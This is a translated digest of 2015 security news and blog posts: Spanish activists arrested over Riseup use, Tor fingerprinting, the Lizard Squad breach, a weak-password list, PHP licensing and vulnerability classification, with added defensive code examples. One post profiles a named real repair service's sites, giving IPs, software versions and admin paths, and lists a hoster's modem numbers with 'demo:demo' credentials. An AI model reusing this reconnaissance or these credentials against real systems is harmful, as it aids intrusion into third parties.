Spanish judge Javier Gomez Bermudez accepted the use of the encrypted mail service Riseup by a group of Spanish activists, together with their possession of the book "Against Democracy" (Contra la democràcia), as an indication that the group is engaged in terrorist activity. As a result, during Operation "Pandora" at the end of December 2014, more than 400 police officers raided 14 private homes and community centers in Spain, and 11 people were arrested. Four of them were released, but seven were imprisoned on charges of "terrorist activity of an unspecified nature". This led to a protest march of many thousands. The situation is highlighted by NetworkWorld.

Significantly, the so-called "terrorists" did not kill anyone, blew nothing up and threatened no one. All they were guilty of before the law was possessing certain printed materials and using encrypted means of communication. There are unproven allegations of a possible link between the activists and ATM bombings in 2012 and 2013, but the judge explained his decision by saying that he was not interested in the group's connection with those explosions and was investigating the group's activity on the basis of the potential harm it might cause in the future. In other words, this was preventive justice.



On top of the current economic crisis, Spain is reeling from the growing movement for Catalan secession (a referendum on the issue was cancelled, but in polls 80% of the population were in favour of the autonomous region's independence) and from the continuing problems with Basque nationalists. Perhaps these problems forced the security agencies to apply harsh measures in such cases.

All this takes place against the background of the European Parliament's statement, based on the disclosed facts of NSA surveillance, that "privacy is not a luxury but a basic right in a free and democratic society." Riseup, which provides users with encrypted mail (registration is currently by invitation), in turn published a post on its blog titled "Security is not a crime": "We reject such a Kafkaesque criminalization of social movements, as well as the ridiculous and extremely disturbing conclusion that caring about one's own privacy can be equated with terrorism."

How the Tor Project is fighting browser fingerprinting

The essence of the method is that on different systems and in different browsers text (and not just text) is rendered differently, because many different components at different levels are responsible for it, each of which can have different settings for the components of the lower layer.

Trivially, different fonts (with a different set of characters, slightly different glyphs and ligatures, different kerning ...).
Different parameters passed to library functions by different browsers.
Different versions of libfreetype and other rendering libraries.
Different implementations in different OSes and OS settings (for example, different versions of ClearType and different screen resolutions).
Different graphics drivers.
Different graphics hardware.

This article describes a method using the getImageData API, which returns the image pixel by pixel. The use of WebGL is also considered: 3D scenes too are rendered differently on different systems.

The paper recommended pure software rendering, without using operating system components or other software installed on the PC, adding noise, and other methods of protection. The Tor Project patched canvas fingerprinting by asking the user's permission for getImageData and replacing arbitrary fonts with a fallback font (which is why we have measurements of 10).

Defective by design

There are other APIs that leak the same information, for example the text measurement API. If text is rendered differently, its dimensions should also differ slightly. We test this hypothesis using the measureText API of the same canvas and the getBoundingClientRect API of the DOM.

Clone the gist, run it on a computer with the latest (or a recent) TBB, open the HTML file from the repository, and post the result in the comments. You can also go to the Fiddle, or the Fiddle in full screen. In principle one could skip hashing, which would leave more room for data mining, but even in compressed form the complete set of information about each font takes up a great deal of space. Therefore we make do with hashes. Whoever wants to dig deeper can uncomment some lines in the source.

The servers of the hackers who DDoSed Microsoft Xbox Live and Sony PlayStation Network have been hacked

The hacking of the Lizard Squad hacker group's servers can be called a curious case. It was this group that disrupted the Microsoft Xbox Live and Sony PlayStation Network services by launching a powerful DDoS attack. Now, as it turns out, the would-be hackers themselves have become the victims of other intruders.

The thing is that the group created its own service, Lizard Stresser, which lets anyone order a DDoS attack. Customer data was stored in clear (unencrypted) form on the service's servers. As a result, third-party crackers made off with a database holding the data of 14,241 accounts.

Moreover, many of the accounts still held money intended for Lizard Squad. There were several hundred such "funded" accounts, and the funds were kept in the cryptocurrency Bitcoin. In US dollar terms the "clients'" accounts held about 11 thousand US dollars.

It is worth recalling that the attack on the Xbox Live and PlayStation Network servers took place on December 25, 2014. Service was disrupted, and the experts were able to restore it only two days later. After the attack, Lizard Squad members said the purpose of the "action" was to demonstrate the companies' inefficient spending, plus the insufficient quality of the companies' own services.

Not so long ago police arrested one of the Lizard Squad members; now several other people have been arrested.

List of the simplest passwords: 2014

Once a year, lists of the simplest passwords used by network users are reliably published on the web. Most interestingly, simple and repetitive account passwords are used not only by inexperienced users but also by quite a few professionals. Most are simply too lazy to change the password to something more complex.

This year the list of the simplest passwords was published by SplashData. All the data shown is used with the consent of the service's users. On Geektimes it probably makes no sense to warn about the dangers of such passwords; everyone already knows. Let's just look at the list.

Perhaps it is not surprising that the top spots went to codes of the type 123456 and 12345, together with the word password. By the way, these passwords are often used even by advanced users, simply because they are passwords for services that are not critical for the person (for example, an account at some newspaper, a forum, or another similar resource).

Nevertheless, there are those who use very weak combinations even to register for services that hold the user's credit card details. For them probably no warnings will help. So here it is, the full list:

1. 123456
2. password
3. 12345
4. 12345678
5. qwerty
6. 123456789
7. 1234
8. baseball
9. dragon
10. football
11. 1234567
12. monkey
13. letmein
14. abc123
15. 111111
16. mustang
17. access
18. shadow
19. master
20. michael
21. superman
22. 696969
23. 123123
24. batman
25. trustno1

Interestingly, codes of the type «batman» or «dragon» are relatively new for SplashData; previously users did not create such passwords.
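The list above is only useful to a site operator if it is turned into a check, and the first post on this page shows why unsalted MD5 makes that check trivial for anyone holding the hash table. The following is an added example, not from either article: it audits a constructed user table stored as unsalted MD5 against the 25 passwords listed, then shows the salted PBKDF2 storage and an on-login migration that an operator would move to. The user names, passwords and iteration count are assumed.

```python
import hashlib
import hmac
import os

# The SplashData 2014 list above.
TOP25_2014 = [
    "123456", "password", "12345", "12345678", "qwerty", "123456789", "1234",
    "baseball", "dragon", "football", "1234567", "monkey", "letmein", "abc123",
    "111111", "mustang", "access", "shadow", "master", "michael", "superman",
    "696969", "123123", "batman", "trustno1",
]


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed user table (not real data): username -> unsalted MD5 hex digest,
# the storage scheme the site in the first post used.
SAMPLE_USERS = {
    "alice": md5_hex("password"),
    "bob": md5_hex("correct-horse-constructed-9"),
    "carol": md5_hex("dragon"),
}


def audit_unsalted_md5(users, wordlist=TOP25_2014):
    """Return {username: password} for every account whose stored hash equals
    the MD5 of a listed password. Without a salt, len(wordlist) hashes cover
    the whole table however many users it has; that is the weakness."""
    known = {md5_hex(word): word for word in wordlist}
    return {user: known[digest] for user, digest in users.items() if digest in known}


def hash_password(password, salt=None, iterations=200_000):
    """Per-user random salt plus a slow KDF: the same password yields different
    records for different users, and each guess costs `iterations` HMAC rounds."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def migrate_on_login(users, username, password):
    """Upgrade path: when a user logs in and the stored value is still a bare MD5,
    verify it the old way, then replace it with a salted PBKDF2 record."""
    stored = users[username]
    if "$" in stored:
        return verify_password(password, stored)
    if not hmac.compare_digest(stored, md5_hex(password)):
        return False
    users[username] = hash_password(password)
    return True
```

The audit is the cheap part: 25 digests checked against a dict. Accounts it flags should be forced through a reset, and the migration keeps old records working until their owners next log in, after which the unsalted hash is gone.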

Large companies have agreed to protect students' personal data

Google and Khan Academy have joined the Student Data Privacy Act (SDPA) agreement between the giants of the information and education markets, which provides for protecting students' personal data from spreading across the Internet. Besides them, more than 15 companies signed the agreement yesterday. Last week about 75 organizations had already done so, including giants such as Microsoft and Apple.

Companies that have signed the agreement will have to abide by a set of principles on the use of student data. The signatories promise not to sell the collected data or use it in targeted advertising. In addition, access by parents and students to their own data will be made easier and more streamlined, and the process of collecting such data should become more transparent.

The Student Data Privacy Act initiative was proposed about a week ago by US President Barack Obama in a speech to Congress. The main idea of the speech: American life is highly dependent on the digital world, and events such as hacker attacks (Obama mentioned the well-known Sony Pictures incident) can have serious consequences. The President insisted that the list of Student Data Privacy Act participants be open, so that parents of young people can find out who signed the agreement and who did not.

About a week ago Google refused to put its signature under the SDPA: in an interview with Business Insider, the search giant's officials explained this by saying that protecting users' personal data is already a "top priority" for the company. What has changed since then, and why Google suddenly decided to change its point of view, is unknown.

5,000 gas stations in the United States are threatened by cyberattacks because of obsolete equipment

Security experts have discovered vulnerabilities in ATG devices that monitor fuel levels at US gas stations. In theory, hackers can gain control of a device to turn off the fuel supply or trigger false alarms, including a leak alarm, which automatically shuts off all the pumps and paralyzes the station. According to the study, an attacker over the Internet can gain control of such sensors at up to 5,300 gas stations in the United States. The equipment's communication protocols are obsolete, and the station owners use ordinary routers and do not think about security.


The automated devices report the amount of fuel at the station so that it is known when to order gasoline. Attackers over the Internet can alter the settings, producing false reports or completely shutting off the gasoline supply by reporting that the tank is empty. If the device says the tank is full, the station may simply be left without fuel, because no one will order any. In the worst case an attacker can report a leak, which disables all the pumps and paralyzes the station.

As the researchers note, gas stations often use ordinary routers bought from Best Buy, so after connecting to the network the station owners face the same problems as an ordinary consumer. The problem is that these devices monitor the fuel level in the tanks. Most stations are owned not by large corporations but by private owners, who take little interest in the security of the network connection.

The most common sensors are manufactured by Veeder-Root. These sensors can be protected with a six-character password, which is sent unencrypted and can be intercepted, but mostly no password is used at all.

Among the main problems the researchers note the obsolete communication protocols, designed for this equipment about twenty years ago.

Protect PHP scripts from copying

1. Issuing licenses and validating the license in the script

I create the key for a domain approximately as follows:
$key = md5($domain . $secretword);

The script checks its license as follows:
$key == md5($domain . $secretword);

Indeed, it is ugly to store $secretword in the scripts themselves. Therefore one could use public-key cryptography: when issuing a license I sign it with my private key, and the script that validates the license uses the public key to check its validity. But I did not find any public-key functions in the standard PHP package, not even RSA (am I blind?). If you can help, I will be grateful.

So, the script has checked the correctness of the license, that is, whether the given key fits the given domain. Let's go on.

2. Checking the domain

Can the script check that it is running on the specified domain? We have no confidence in $_SERVER['HTTP_HOST'].
One of the conditions is no connections to another server. So we connect to ourselves on the claimed domain and check whether we are there :)

To be more precise:
0) zero step: when we are called with the parameter action=skazhi_chislo, return the stored number
1) store a random number on the server (for example, in a temporary file)
2) request nash_domen.ru/nash_skript.php?action=skazhi_chislo
3) check what number that address gives us. If it matches the one we stored, we are at home :)
I have simplified the algorithm a little; in fact these random numbers need to be accounted for separately for each call to the script.

Now the script knows that the license is valid and that it is on the right domain. The main problem is solved!

You will tell me: wtf, the script will call itself on every request? Indeed, that is somewhat brutal. That is why:

3. Temporary license

The first time, if the check succeeds, the script writes a temporary license to a temporary file.
The temporary license is something like md5(today's date, domain, secret word).
Now on every request we check only the temporary license, which is valid for one day. As soon as something is wrong with the temporary license (it was changed, deleted, or the day has passed), the script performs the full check again and stores a new temporary license.
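A keyed construction for the license key of section 1 and the daily token of section 3, as an added example that is not the post's code and is written in Python rather than PHP. It assumes a vendor secret and an example domain; the date is passed in as an ISO string so a caller can supply today's date. Two defects in md5($domain . $secretword) are addressed: plain concatenation leaves no boundary between domain and secret, and a keyed MAC with a constant-time comparison replaces an unkeyed hash compared with ==. What it cannot fix is the point the post raises: the secret still has to live in the script, and only a public-key signature removes it (PHP does ship openssl_sign() and openssl_verify() in its OpenSSL extension, which answers the author's question).

```python
import hashlib
import hmac

# Assumed values for the example (not the post's): the vendor's secret.
SECRET = b"vendor-secret-constructed"


def _mac(secret, *parts):
    """HMAC-SHA256 over length-delimited parts, so 'ab'+'c' and 'a'+'bc' can never
    produce the same input (md5(domain . secretword) has no such boundary)."""
    mac = hmac.new(secret, digestmod=hashlib.sha256)
    for part in parts:
        data = part.encode()
        mac.update(len(data).to_bytes(4, "big") + data)
    return mac.hexdigest()


def issue_license(domain, secret=SECRET):
    """Section 1: the key issued to a customer for one domain (case-insensitive)."""
    return _mac(secret, "license", domain.lower())


def check_license(domain, key, secret=SECRET):
    # compare in constant time rather than with ==
    return hmac.compare_digest(issue_license(domain, secret), key)


def issue_temp_license(domain, day_iso, secret=SECRET):
    """Section 3: the daily token, bound to the date so it expires when the day changes.
    day_iso is a string like '2015-01-23' (datetime.date.today().isoformat())."""
    return _mac(secret, "temp", day_iso, domain.lower())


def check_temp_license(domain, token, today_iso, secret=SECRET):
    return hmac.compare_digest(issue_temp_license(domain, today_iso, secret), token)
```

The temporary token is recomputed from the date rather than stored with an expiry field, so a stale file fails the check by itself and the full check of section 2 runs again, exactly the behaviour the post describes.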

4. Running the script on a local computer without a license


It would be ideal if the script did not require a license when run on a local computer. Why should a person ask me for a license if he just wants to test the script on his own computer? He should simply download it and use it. But once he puts the script on a server, then he comes to me.

I do not know how to solve this problem. So far I have 3 options, and I do not like any of them:
1) If the script is on a domain without dots (like myscript/), assume it is a virtual domain and most likely a test site. The drawback of this method: craftsmen will create a virtual domain on the server and make the real domain an alias of it. And I do not know what to do with the domain localhost.

2) Check $_SERVER['REMOTE_ADDR'] for '127' at the beginning of the IP address. Drawback: this variable can be overridden before the script runs.

3) It's funny, but you can check the server's operating system and allow execution under Windows. Just don't hit me, it's only an option.

Planning a security analysis of web resources

This is specialized material, not intended for a wide audience, given the low level of interest in the topic. The article may be useful to specialists who regularly review the security of web servers. The proposed methods should help organize the data on a resource's structure and characteristics and produce something like a list of steps to perform during the test.

The procedures and recordkeeping were chosen by the author on the basis of personal preference (and are in many ways inspired by the OWASP guidelines (2), etc.); any practitioner can (and most likely will want to) use their own set of techniques and their own kind of "logbook". Likewise, many of the online tools mentioned are not unique; one can create analogs or prefer ready-made ones.

A little about the OWASP Testing Guide: the official website currently offers version 3 (349 pages), whereas previously OWASP_Testing_Guide_v3.full.pdf (374 pages) was available for download. Among the guide's drawbacks one can cite some redundancy; some of the described scenarios seem unlikely or extremely rare.

However, the advice on organizing tests and the risk classification system are definitely helpful. Other materials worth mentioning are the Common Criteria for Information Technology Security Evaluation and OSSTMM (Open Source Security Testing Methodology Manual).

For demonstration purposes, the resources of a certain service center were chosen, one that spoils customers' equipment instead of repairing it.


The analysis procedure

In my case the data is entered into an Excel table prepared from a template that includes a list of the information collected in the course of the security analysis. The table is organized as follows: each type of data is assigned a symbol, which serves as shorthand for the action by which that information can be obtained. There is space for a mark that each action has been performed, and for recording the results (including abbreviations). It looks like this:

______________________________________________
[RDNS] | Reverse DNS | x | Reverse DNS data
----------------------------------------------
One of the first steps is identifying the resource's main identifiers (IP, hosting, web server). For this the combined service Domain Dossier (3) seems to me the most convenient. The Firefox add-on Server Spy (4) also helps identify the server software.

simservice.ru = 213.189.197.165 (axx165.distributed.zenon.net)
samsungremont.ru = 89.111.176.12 (fe16.hc.ru)
Both sites are on the shared hosting of "Zenon" and "Hosting Center", using the nginx web server and the osCommerce shop engine. On simservice.ru we found PHP/5.2.17. The livetex.ru feedback widget is used.

For reverse DNS on the above I use the online services Robtex (5) and BGP Looking Glass (6), which also determine whether it is a dedicated server or shared hosting (in the latter case, to obtain data on the other resources on the shared hosting).

Then visit the studied resource with an HTTP/HTTPS sniffer implemented as a Firefox add-on, Foxmeter (7), which generally gives insight into the site's structure, cross-site scripts/widgets, etc. Get the list of available methods with an HTTP OPTIONS request (the Poster add-on (8), or curl). In this case neither server answered OPTIONS. You can also inquire about the details of the SSL certificate, if any; an online tool, among others, is available on serversniff.net (10). In some cases a search query of the form "victim.com" site:victim.com brings unexpected results: files with incorrectly set permissions, service pages, etc. samsungremont.ru answered a request for .htaccess with a 403 error on behalf of Apache/1.3.42 (masking).

At this stage it is already possible to get an idea of the server and CMS. Additional information can be found in the standard robots.txt and sitemap.xml (sitemap.xml.gz) files. If sitemap.xml is missing, the gap can be filled with an online generator (9) or a client application. The studied resources served the standard osCommerce robots.txt; sitemap.xml had to be generated. In some cases information about the designer (a company or an individual) can be valuable: many use typical solutions, and some design studios flatly refuse to recognize .htaccess, with the result that all their products have the same type of vulnerability, directory listing (OWASP-AZ-001). In our case the design was done by the design bureau pella.ru, without any errors (apart from the ugly background image).

To get an idea of the hosting, and not least of the software in use, it is recommended to investigate the host's official website. So as not to repeat this step again, the data is recorded in a separate table of hosters (hardware, OS, address ranges, customer-specific domains). In this case, information about the "Zenon" modem pool was of interest: test access: demo:demo

745-7171 - Cisco Systems Access Server 5300
251-1030 - USRobotics MP16
After identifying the CMS it is desirable to obtain a copy for analysis. In most cases even big companies use free engines like WordPress/Drupal/Joomla!. Almost all paid engines can also be downloaded as trial versions, which allows studying their structure and possible security problems. Common engines often suffer from errors, such as user listing in WordPress or forced registration in Joomla!, allowing the use of a number of official functions.

When studying the structure of the web resource, special attention is paid to the location of data and administrative interfaces. An accessible administrative login is risk classification OWASP-CM-007. In this case the administrative login is at /admin.

Any error messages from the server can also carry useful information, such as physical file paths and service logins. In some cases it is worth looking at the cookies: they may also disclose information about the server. On the studied sites: standard osCommerce and livetex cookies. The presence of an internal search engine also adds information, and any form is a potential attack vector. A search engine was found.
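The recordkeeping the article describes, applied to the OPTIONS and .htaccess probes and the cookie inspection above, as an added example that is not the article's own tooling. The two raw HTTP responses are constructed (their Server, Allow and Set-Cookie values are made up to resemble the findings in the text), the [OPT]/[SRV]/[CKE] codes are assumed shorthands in the style of the article's [RDNS], and the cookie-to-engine mapping is a small assumed table. The point it adds is the check a reviewer wants automated: when different probes return different Server banners, the logbook should record a probable proxy or masking rather than a single server type.

```python
# Constructed raw responses (not from the article), shaped like what the OPTIONS
# probe and the .htaccess request in the text return.
RESPONSES = {
    "OPTIONS /": (
        "HTTP/1.1 200 OK\r\n"
        "Server: nginx/1.6.2\r\n"
        "Allow: GET, HEAD, POST, OPTIONS\r\n"
        "X-Powered-By: PHP/5.2.17\r\n"
        "Set-Cookie: osCsid=constructed1; path=/\r\n"
        "Set-Cookie: PHPSESSID=constructed2; path=/\r\n"
        "Content-Length: 0\r\n\r\n"
    ),
    "GET /.htaccess": (
        "HTTP/1.1 403 Forbidden\r\n"
        "Server: Apache/1.3.42\r\n"
        "Content-Type: text/html\r\n\r\n"
        "<h1>Forbidden</h1>"
    ),
}

# Assumed mapping from session cookie name to the engine that sets it.
COOKIE_HINTS = {"osCsid": "osCommerce", "PHPSESSID": "PHP session"}


def parse_response(raw):
    """Split a raw HTTP response into (status, headers); repeated headers become lists."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def logbook_rows(responses):
    """Turn probe responses into rows of the [CODE] | description | done | data table."""
    rows = []
    banners = set()
    cookies = set()
    for probe, raw in responses.items():
        status, headers = parse_response(raw)
        banners.update(headers.get("server", []))
        for cookie in headers.get("set-cookie", []):
            cookies.add(cookie.split("=", 1)[0])
        if "allow" in headers:
            rows.append(("[OPT]", "HTTP OPTIONS", "x", headers["allow"][0]))
        if "x-powered-by" in headers:
            rows.append(("[PWR]", "X-Powered-By", "x", headers["x-powered-by"][0]))
        rows.append(("[HDR]", f"{probe} status", "x", str(status)))
    rows.append(("[SRV]", "Server banner(s)", "x", ", ".join(sorted(banners))))
    if len(banners) > 1:
        # The situation the article met: nginx on one probe, Apache on the 403 page.
        rows.append(("[SRV]", "Banner mismatch", "x",
                     "different Server headers per probe: proxy or masking likely"))
    engines = sorted({COOKIE_HINTS[c] for c in cookies if c in COOKIE_HINTS})
    hint = " -> " + ", ".join(engines) if engines else ""
    rows.append(("[CKE]", "Cookie names", "x", ", ".join(sorted(cookies)) + hint))
    return rows


def format_rows(rows):
    """Render rows in the article's pipe-separated layout."""
    return "\n".join(" | ".join(row) for row in rows)


if __name__ == "__main__":
    print(format_rows(logbook_rows(RESPONSES)))
```

Feeding real captures into RESPONSES is the only change needed to use it on a test; the parser deliberately ignores the body, since only the header fields go into the table.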

Thursday, January 15, 2015

Vulnerabilities of computer systems and their classification

A vulnerability is any characteristic of an information system whose use by an offender may result in the realization of a threat. It does not matter whether the vulnerability is used purposefully or the use happens unintentionally. The offender can be any entity on the corporate network that attempts unauthorized access to network resources by mistake, out of ignorance, or with malicious intent.

To eliminate confusion over the naming of vulnerabilities and attacks, in 1999 the MITRE Corporation proposed a solution independent of the various vulnerability-scanner manufacturers. This was implemented as the CVE database (Common Vulnerability Enumeration), later renamed Common Vulnerabilities and Exposures. This allowed all professionals and manufacturers to speak the same language. For example, the different names of one and the same vulnerability (CA-96.06.cgi_example_code, HTTP 'phf' Attack, http-cgi-phf, phf CGI allows remote command execution, PHF Attacks - Fun and games for the whole family, #107 - cgi-phf, #3200 - WWW phf attack, Vulnerability in NCSA/Apache Example Code, http_escshellcmd, #180 HTTP Server CGI example code compromises http server) received the single code CVE-1999-0067.

Besides MITRE's own experts, experts from many well-known companies and organizations took part in developing the CVE database, for example ISS, Cisco, BindView, Axent, NFR, L-3, CyberSafe, CERT, Carnegie Mellon University, the SANS Institute, UC Davis Computer Security Lab, CERIAS, etc. Support for CVE has been declared by Internet Security Systems, Cisco, Axent, BindView, IBM and others. However, despite such an attractive initiative, the CVE database is not yet widespread among manufacturers of commercial products.

The most dangerous are design vulnerabilities, which can be detected and removed only with great difficulty. In this case the vulnerability is inherent in the design or algorithm, and therefore even a perfect implementation (which is impossible in principle) does not eliminate it.

An example is the vulnerabilities of the TCP/IP protocol stack. Underestimating security requirements when creating this stack has led to a situation where not a month passes without the announcement of a new vulnerability in the TCP/IP protocols.

For example, on 7 and 8 February 2000 such popular and leading Internet servers as Yahoo, eBay, Amazon, Buy and CNN malfunctioned. On February 9 a similar fate befell the servers of ZDNet, Datek and E*Trade. The FBI investigation revealed that these servers failed because of the huge number of requests addressed to them, which the servers could not handle. For example, the traffic directed at the Buy server exceeded the average by 24 times and was 8 times higher than the maximum load the Buy server was designed to sustain. It is no longer possible to eliminate these shortcomings once and for all; only temporary or partial measures remain.

However, there are exceptions. For example, introducing a set of modems into a corporate network by design makes the staff's work easier but greatly complicates the work of the security service, since it creates potential ways to bypass the firewall that protects internal resources from unauthorized use. Yet this vulnerability is easy enough to find and fix.

The meaning of the second category of vulnerabilities (implementation vulnerabilities) is an error made during the implementation phase, in software or hardware, of a design or algorithm that is correct from a security standpoint. A striking example of this kind of vulnerability is the "buffer overflow" in many program implementations, for example sendmail or Internet Explorer. Detecting and eliminating this type of vulnerability is relatively easy: update the executable code or change the source code of the vulnerable software. Another example of an implementation vulnerability is the case of Tandem computers, which occurred on November 1, 1992 and January 7, 1993. At 3 am the functioning of most Tandem computers around the world was disrupted because of a failure in the BASE23 Nucleus subsystem, caused by the overflow of a microcode timer variable at a certain moment. Because of this error the system clock value was reset to December 1983, which sometimes led to misinterpretation of data in a variety of financial applications.